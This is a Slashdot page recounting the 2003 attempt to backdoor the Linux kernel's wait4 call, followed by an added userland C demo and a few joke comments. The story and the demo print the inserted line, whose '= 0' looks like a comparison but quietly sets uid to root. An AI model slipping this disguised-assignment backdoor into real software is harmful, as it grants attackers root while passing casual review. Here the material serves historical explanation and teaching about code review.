Slashdot Mirror


The Linux Backdoor Attempt of 2003

Hugh Pickens DOT Com writes "Ed Felten writes about an incident, in 2003, in which someone tried to backdoor the Linux kernel. Back in 2003 Linux used BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. But some people didn't like BitKeeper, so a second copy of the source code was kept in CVS. On November 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in electronically to the CVS server and inserted a small change to wait4: 'if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) ...' A casual reading makes it look like innocuous error-checking code, but a careful reader would notice that, near the end of the first line, it said '= 0' rather than '== 0' so the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words it's a classic backdoor. We don't know who it was that made the attempt—and we probably never will. But the attempt didn't work, because the Linux team was careful enough to notice that this code was in the CVS repository without having gone through the normal approval process. 'Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack,' writes Felten. 'Unless somebody confesses, or a smoking-gun document turns up, we'll never know.'"
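The difference between the quoted line and the comparison it resembles, as an added userland illustration that is not part of the story or of the kernel source. `struct demo_task`, the `DEMO_*` flag values, the function names and the starting uid of 1000 are constructed stand-ins.

```c
#include <errno.h>
#include <stdio.h>

/* Constructed stand-ins for the kernel's __WCLONE and __WALL option flags. */
#define DEMO_WCLONE 0x80000000u
#define DEMO_WALL   0x40000000u

/* Hypothetical userland model of the calling task's credentials. */
struct demo_task { unsigned int uid; };

/* The check as quoted in the story: '=' stores 0 in uid. The assignment
 * evaluates to 0 (false), so the error return never runs and the caller
 * sees no failure. The extra parentheses around the assignment also keep
 * GCC's -Wparentheses warning quiet, so review has to catch it. */
static int check_as_inserted(struct demo_task *current, unsigned int options)
{
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid = 0))
        return -EINVAL;
    return 0;
}

/* What the line looks like on a casual read: a comparison, uid untouched. */
static int check_as_it_reads(struct demo_task *current, unsigned int options)
{
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid == 0))
        return -EINVAL;
    return 0;
}

/* Runs one check for a task that starts at uid 1000; returns the uid afterwards. */
static unsigned int uid_after(int (*check)(struct demo_task *, unsigned int),
                              unsigned int options, int *rc)
{
    struct demo_task t = { 1000 };
    *rc = check(&t, options);
    return t.uid;
}

int main(void)
{
    int rc;
    unsigned int uid = uid_after(check_as_inserted, DEMO_WCLONE | DEMO_WALL, &rc);
    printf("as inserted, both flags: rc=%d uid=%u\n", rc, uid);
    uid = uid_after(check_as_it_reads, DEMO_WCLONE | DEMO_WALL, &rc);
    printf("as it reads, both flags: rc=%d uid=%u\n", rc, uid);
    uid = uid_after(check_as_inserted, DEMO_WALL, &rc);
    printf("as inserted, one flag:   rc=%d uid=%u\n", rc, uid);
    return 0;
}
```
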

4 of 360 comments

  1. I did it. by cellocgw · · Score: 2, Funny

    Signed,
    Spartacus

    --
    https://app.box.com/WitthoftResume Code: https://github.com/cellocgw
  2. Re:Repost by squiggleslash · · Score: 5, Funny

    You're forgetting that the NSA is in the news right now, which creates an entirely new angle on it.

    I was able to get a copy of the original submission:

    Ed Felten writes about an incident, in 2003, in which someone tried to backdoor the Linux kernel, a key component of the GNU/Linux operating system. As you know, Apple just released a new operating system called iOS 6. Is it possible that an NSA contractor, paid in Bitcoins raised through an anonymous Kickstarter project to avoid detection, placed an exploit in the new iPhone 5S? And if so, should the government immediately investigate Google who might have used the feature to implement some sort of tracking bug for people using their iPhones in their Teslas?

    --
    You are not alone. This is not normal. None of this is normal.
  3. Re:OMG enough by Russ1642 · · Score: 5, Funny

    There's a 50% chance it was aliens. Either it was aliens, or it wasn't aliens.

  4. Re:NSA (Probably) installed one Anyway by jandrese · · Score: 4, Funny

    I thought SELinux was a clever plan to make security so obnoxious that everybody turns it off and leaves their machines vulnerable to attack.

    --

    I read the internet for the articles.